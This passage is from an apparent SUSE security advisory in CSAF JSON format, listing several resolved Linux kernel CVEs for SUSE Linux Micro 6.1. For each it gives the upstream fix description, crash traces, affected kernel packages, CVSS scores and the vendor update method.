"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2023-54042"
},
{
"cve": "CVE-2023-54045",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54045"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naudit: fix possible soft lockup in __audit_inode_child()\n\nTracefs or debugfs maybe cause hundreds to thousands of PATH records,\ntoo many PATH records maybe cause soft lockup.\n\nFor example:\n 1. CONFIG_KASAN=y \u0026\u0026 CONFIG_PREEMPTION=n\n 2. auditctl -a exit,always -S open -k key\n 3. sysctl -w kernel.watchdog_thresh=5\n 4. mkdir /sys/kernel/debug/tracing/instances/test\n\nThere may be a soft lockup as follows:\n watchdog: BUG: soft lockup - CPU#45 stuck for 7s! [mkdir:15498]\n Kernel panic - not syncing: softlockup: hung tasks\n Call trace:\n dump_backtrace+0x0/0x30c\n show_stack+0x20/0x30\n dump_stack+0x11c/0x174\n panic+0x27c/0x494\n watchdog_timer_fn+0x2bc/0x390\n __run_hrtimer+0x148/0x4fc\n __hrtimer_run_queues+0x154/0x210\n hrtimer_interrupt+0x2c4/0x760\n arch_timer_handler_phys+0x48/0x60\n handle_percpu_devid_irq+0xe0/0x340\n __handle_domain_irq+0xbc/0x130\n gic_handle_irq+0x78/0x460\n el1_irq+0xb8/0x140\n __audit_inode_child+0x240/0x7bc\n tracefs_create_file+0x1b8/0x2a0\n trace_create_file+0x18/0x50\n event_create_dir+0x204/0x30c\n __trace_add_new_event+0xac/0x100\n event_trace_add_tracer+0xa0/0x130\n trace_array_create_dir+0x60/0x140\n trace_array_create+0x1e0/0x370\n instance_mkdir+0x90/0xd0\n tracefs_syscall_mkdir+0x68/0xa0\n vfs_mkdir+0x21c/0x34c\n do_mkdirat+0x1b4/0x1d4\n __arm64_sys_mkdirat+0x4c/0x60\n el0_svc_common.constprop.0+0xa8/0x240\n do_el0_svc+0x8c/0xc0\n el0_svc+0x20/0x30\n el0_sync_handler+0xb0/0xb4\n el0_sync+0x160/0x180\n\nTherefore, we add cond_resched() to __audit_inode_child() to fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54045",
"url": "https://www.suse.com/security/cve/CVE-2023-54045"
},
{
"category": "external",
"summary": "SUSE Bug 1256285 for CVE-2023-54045",
"url": "https://bugzilla.suse.com/1256285"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54045"
},
{
"cve": "CVE-2023-54048",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54048"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/bnxt_re: Prevent handling any completions after qp destroy\n\nHW may generate completions that indicates QP is destroyed.\nDriver should not be scheduling any more completion handlers\nfor this QP, after the QP is destroyed. Since CQs are active\nduring the QP destroy, driver may still schedule completion\nhandlers. This can cause a race where the destroy_cq and poll_cq\nrunning simultaneously.\n\nSnippet of kernel panic while doing bnxt_re driver load unload in loop.\nThis indicates a poll after the CQ is freed. \n\n[77786.481636] Call Trace:\n[77786.481640] \u003cTASK\u003e\n[77786.481644] bnxt_re_poll_cq+0x14a/0x620 [bnxt_re]\n[77786.481658] ? kvm_clock_read+0x14/0x30\n[77786.481693] __ib_process_cq+0x57/0x190 [ib_core]\n[77786.481728] ib_cq_poll_work+0x26/0x80 [ib_core]\n[77786.481761] process_one_work+0x1e5/0x3f0\n[77786.481768] worker_thread+0x50/0x3a0\n[77786.481785] ? __pfx_worker_thread+0x10/0x10\n[77786.481790] kthread+0xe2/0x110\n[77786.481794] ? __pfx_kthread+0x10/0x10\n[77786.481797] ret_from_fork+0x2c/0x50\n\nTo avoid this, complete all completion handlers before returning the\ndestroy QP. If free_cq is called soon after destroy_qp, IB stack\nwill cancel the CQ work before invoking the destroy_cq verb and\nthis will prevent any race mentioned.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54048",
"url": "https://www.suse.com/security/cve/CVE-2023-54048"
},
{
"category": "external",
"summary": "SUSE Bug 1256395 for CVE-2023-54048",
"url": "https://bugzilla.suse.com/1256395"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54048"
},
{
"cve": "CVE-2023-54049",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54049"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nrpmsg: glink: Add check for kstrdup\n\nAdd check for the return value of kstrdup() and return the error\nif it fails in order to avoid NULL pointer dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54049",
"url": "https://www.suse.com/security/cve/CVE-2023-54049"
},
{
"category": "external",
"summary": "SUSE Bug 1256396 for CVE-2023-54049",
"url": "https://bugzilla.suse.com/1256396"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54049"
},
{
"cve": "CVE-2023-54051",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54051"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: do not allow gso_size to be set to GSO_BY_FRAGS\n\nOne missing check in virtio_net_hdr_to_skb() allowed\nsyzbot to crash kernels again [1]\n\nDo not allow gso_size to be set to GSO_BY_FRAGS (0xffff),\nbecause this magic value is used by the kernel.\n\n[1]\ngeneral protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN\nKASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]\nCPU: 0 PID: 5039 Comm: syz-executor401 Not tainted 6.5.0-rc5-next-20230809-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 07/26/2023\nRIP: 0010:skb_segment+0x1a52/0x3ef0 net/core/skbuff.c:4500\nCode: 00 00 00 e9 ab eb ff ff e8 6b 96 5d f9 48 8b 84 24 00 01 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 \u003c0f\u003e b6 04 02 84 c0 74 08 3c 03 0f 8e ea 21 00 00 48 8b 84 24 00 01\nRSP: 0018:ffffc90003d3f1c8 EFLAGS: 00010202\nRAX: dffffc0000000000 RBX: 000000000001fffe RCX: 0000000000000000\nRDX: 000000000000000e RSI: ffffffff882a3115 RDI: 0000000000000070\nRBP: ffffc90003d3f378 R08: 0000000000000005 R09: 000000000000ffff\nR10: 000000000000ffff R11: 5ee4a93e456187d6 R12: 000000000001ffc6\nR13: dffffc0000000000 R14: 0000000000000008 R15: 000000000000ffff\nFS: 00005555563f2380(0000) GS:ffff8880b9800000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020020000 CR3: 000000001626d000 CR4: 00000000003506f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n\u003cTASK\u003e\nudp6_ufo_fragment+0x9d2/0xd50 net/ipv6/udp_offload.c:109\nipv6_gso_segment+0x5c4/0x17b0 net/ipv6/ip6_offload.c:120\nskb_mac_gso_segment+0x292/0x610 net/core/gso.c:53\n__skb_gso_segment+0x339/0x710 net/core/gso.c:124\nskb_gso_segment include/net/gso.h:83 [inline]\nvalidate_xmit_skb+0x3a5/0xf10 net/core/dev.c:3625\n__dev_queue_xmit+0x8f0/0x3d60 net/core/dev.c:4329\ndev_queue_xmit include/linux/netdevice.h:3082 [inline]\npacket_xmit+0x257/0x380 net/packet/af_packet.c:276\npacket_snd net/packet/af_packet.c:3087 [inline]\npacket_sendmsg+0x24c7/0x5570 net/packet/af_packet.c:3119\nsock_sendmsg_nosec net/socket.c:727 [inline]\nsock_sendmsg+0xd9/0x180 net/socket.c:750\n____sys_sendmsg+0x6ac/0x940 net/socket.c:2496\n___sys_sendmsg+0x135/0x1d0 net/socket.c:2550\n__sys_sendmsg+0x117/0x1e0 net/socket.c:2579\ndo_syscall_x64 arch/x86/entry/common.c:50 [inline]\ndo_syscall_64+0x38/0xb0 arch/x86/entry/common.c:80\nentry_SYSCALL_64_after_hwframe+0x63/0xcd\nRIP: 0033:0x7ff27cdb34d9",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54051",
"url": "https://www.suse.com/security/cve/CVE-2023-54051"
},
{
"category": "external",
"summary": "SUSE Bug 1256394 for CVE-2023-54051",
"url": "https://bugzilla.suse.com/1256394"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54051"
},
{
"cve": "CVE-2023-54052",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54052"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: mt7921: fix skb leak by txs missing in AMSDU\n\ntxs may be dropped if the frame is aggregated in AMSDU. When the problem\nshows up, some SKBs would be hold in driver to cause network stopped\ntemporarily. Even if the problem can be recovered by txs timeout handling,\nmt7921 still need to disable txs in AMSDU to avoid this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
